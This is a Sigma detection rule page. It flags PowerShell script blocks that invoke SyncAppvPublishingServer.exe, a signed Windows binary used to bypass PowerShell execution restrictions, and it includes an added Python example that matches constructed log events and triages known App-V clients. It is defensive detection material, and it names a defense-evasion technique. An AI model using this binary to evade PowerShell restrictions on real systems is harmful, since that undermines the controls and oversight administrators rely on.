SyncAppvPublishingServer Execution to Bypass Powershell Restriction
Detects SyncAppvPublishingServer process execution, which is commonly used by adversaries to bypass PowerShell execution restrictions.
Sigma rule
title: SyncAppvPublishingServer Execution to Bypass Powershell Restriction
id: dddfebae-c46f-439c-af7a-fdb6bde90218
related:
    - id: fde7929d-8beb-4a4c-b922-be9974671667
      type: derived
    - id: 9f7aa113-9da6-4a8d-907c-5f1a4b908299
      type: derived
status: test
description: Detects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions.
references:
    - https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/
author: 'Ensar Şamil, @sblmsrsn, OSCD Community'
date: 2020/10/05
modified: 2022/12/25
tags:
    - attack.defense_evasion
    - attack.t1218
logsource:
    product: windows
    category: ps_script
    definition: 'Requirements: Script Block Logging must be enabled'
detection:
    selection:
        ScriptBlockText|contains: 'SyncAppvPublishingServer.exe'
    condition: selection
falsepositives:
    - App-V clients
level: medium
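The following is an added example, not part of the rule or the Sigma project, showing how the rule's single `contains` selection behaves when applied to PowerShell Script Block Logging events (the `ps_script` logsource corresponds to Event ID 4104 in Microsoft-Windows-PowerShell/Operational). The sample events, hostnames and the App-V allow-list are constructed for the example; the argument text in the matching event is a placeholder, not a real command line.

```python
"""Apply the Sigma selection `ScriptBlockText|contains: 'SyncAppvPublishingServer.exe'`
to constructed PowerShell Script Block Logging events (Event ID 4104).

All events, hostnames and the allow-list below are constructed for this example.
"""

SCRIPT_BLOCK_EVENT_ID = 4104           # ps_script logsource -> Script Block Logging
NEEDLE = "syncappvpublishingserver.exe"  # lower-cased: Sigma `contains` is case-insensitive

# Constructed sample events; ScriptBlockText values are illustrative only.
SAMPLE_EVENTS = [
    {"EventID": 4104, "Computer": "ws01",
     "ScriptBlockText": "Get-Process | Where-Object CPU -gt 100"},
    {"EventID": 4104, "Computer": "ws02",
     "ScriptBlockText": "SyncAppvPublishingServer.exe <constructed-argument-placeholder>"},
    {"EventID": 4104, "Computer": "appv01",
     "ScriptBlockText": "Start-Process -FilePath C:\\Windows\\System32\\SYNCAPPVPUBLISHINGSERVER.EXE"},
    # Same string in a different event type: outside the rule's logsource, so not matched.
    {"EventID": 4103, "Computer": "ws03",
     "ScriptBlockText": "SyncAppvPublishingServer.exe"},
]

# Constructed allow-list modelled on the rule's `falsepositives: App-V clients` entry.
KNOWN_APPV_CLIENTS = {"appv01"}


def in_logsource(event):
    """Keep only Script Block Logging events, as the ps_script category requires."""
    return event.get("EventID") == SCRIPT_BLOCK_EVENT_ID


def selection_matches(event):
    """ScriptBlockText|contains, with Sigma's default case-insensitive matching."""
    return NEEDLE in event.get("ScriptBlockText", "").lower()


def run_rule(events):
    """Return the events the rule would alert on (condition: selection)."""
    return [e for e in events if in_logsource(e) and selection_matches(e)]


def triage(event):
    """Separate hits on known App-V clients from hits that need a closer look."""
    if event.get("Computer") in KNOWN_APPV_CLIENTS:
        return "likely_benign_appv_client"
    return "investigate"


if __name__ == "__main__":
    for hit in run_rule(SAMPLE_EVENTS):
        print(f"{hit['Computer']}: {triage(hit)}")
```

Two points the code makes explicit: the rule only sees the string if Script Block Logging is enabled (hence the `definition` field), and it matches on the binary name alone, so hosts that legitimately run App-V should be handled in triage or with an environment-specific filter rather than by weakening the selection.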
Related rules
- Application Bypass with RunDLL32 and DllRegisterServer Function
- Rundll32 with Suspicious Export Functionalities
- Rundll32 with Suspicious Process Lineage
- Rundll32 without Command Line
- DLL Execution via Rasautou.exe